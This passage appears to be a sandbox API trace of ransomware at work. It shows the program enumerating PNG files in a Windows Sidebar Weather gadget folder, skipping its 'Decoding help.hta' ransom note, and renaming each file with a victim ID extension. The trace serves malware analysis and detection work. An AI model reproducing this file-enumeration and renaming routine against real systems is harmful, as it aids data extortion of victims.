lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc26e8a2, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc26e8a2, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd77e39c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1010, dwReserved0=0x0, dwReserved1=0x0, cFileName="34.png", cAlternateFileName="")) returned 1 [0059.459] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.459] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.459] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.459] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.459] lstrcmpiW (lpString1="Decoding help.hta", lpString2="34.png") returned 1 [0059.460] lstrlenW (lpString="34.png") returned 6 [0059.460] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.460] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.460] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="34.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\34.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\34.png" [0059.460] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\34.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\34.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\34.png" [0059.460] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\34.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\34.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\34.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.460] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\34.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\34.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\34.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\34.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.460] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc294a01, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc294a01, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd77e39c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1551, dwReserved0=0x0, dwReserved1=0x0, cFileName="35.png", cAlternateFileName="")) returned 1 [0059.460] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.460] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.460] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.460] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.460] lstrcmpiW (lpString1="Decoding help.hta", lpString2="35.png") returned 1 [0059.460] lstrlenW (lpString="35.png") returned 6 [0059.460] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.460] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.460] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="35.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\35.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\35.png" [0059.460] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\35.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\35.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\35.png" [0059.460] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\35.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\35.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\35.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.460] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\35.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\35.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\35.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\35.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.461] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc294a01, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc294a01, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7a44fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x16df, dwReserved0=0x0, dwReserved1=0x0, cFileName="36.png", cAlternateFileName="")) returned 1 [0059.461] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.461] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.461] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.461] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.461] lstrcmpiW (lpString1="Decoding help.hta", lpString2="36.png") returned 1 [0059.461] lstrlenW (lpString="36.png") returned 6 [0059.461] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.461] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.461] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="36.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\36.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\36.png" [0059.461] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\36.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\36.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\36.png" [0059.462] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\36.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\36.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\36.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.462] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\36.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\36.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\36.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\36.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.462] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc2bab60, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc2bab60, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7a44fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1456, dwReserved0=0x0, dwReserved1=0x0, cFileName="37.png", cAlternateFileName="")) returned 1 [0059.462] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.462] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.462] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.462] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.462] lstrcmpiW (lpString1="Decoding help.hta", lpString2="37.png") returned 1 [0059.462] lstrlenW (lpString="37.png") returned 6 [0059.462] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.462] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.462] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="37.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\37.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\37.png" [0059.462] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\37.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\37.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\37.png" [0059.462] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\37.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\37.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\37.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.462] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\37.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\37.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\37.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\37.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.462] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc2bab60, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc2bab60, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7a44fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1456, dwReserved0=0x0, dwReserved1=0x0, cFileName="38.png", cAlternateFileName="")) returned 1 [0059.462] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.462] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.462] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.463] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.463] lstrcmpiW (lpString1="Decoding help.hta", lpString2="38.png") returned 1 [0059.463] lstrlenW (lpString="38.png") returned 6 [0059.463] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.463] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.463] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="38.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\38.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\38.png" [0059.463] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\38.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\38.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\38.png" [0059.463] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\38.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\38.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\38.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.463] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\38.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\38.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\38.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\38.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.393] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc2bab60, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc2bab60, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7a44fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1551, dwReserved0=0x0, dwReserved1=0x0, cFileName="39.png", cAlternateFileName="")) returned 1 [0061.314] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0061.314] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0061.314] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0061.314] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0061.314] lstrcmpiW (lpString1="Decoding help.hta", lpString2="39.png") returned 1 [0061.314] lstrlenW (lpString="39.png") returned 6 [0061.314] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0061.314] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0061.314] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="39.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\39.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\39.png" [0061.314] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\39.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\39.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\39.png" [0061.314] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\39.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\39.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\39.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.314] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\39.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\39.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\39.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\39.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.315] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc306e1e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc306e1e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7a44fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1456, dwReserved0=0x0, dwReserved1=0x0, cFileName="4.png", cAlternateFileName="")) returned 1 [0061.315] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0061.315] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0061.315] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0061.315] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0061.315] lstrcmpiW (lpString1="Decoding help.hta", lpString2="4.png") returned 1 [0061.315] lstrlenW (lpString="4.png") returned 5 [0061.315] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0061.315] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0061.315] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="4.png" | out: 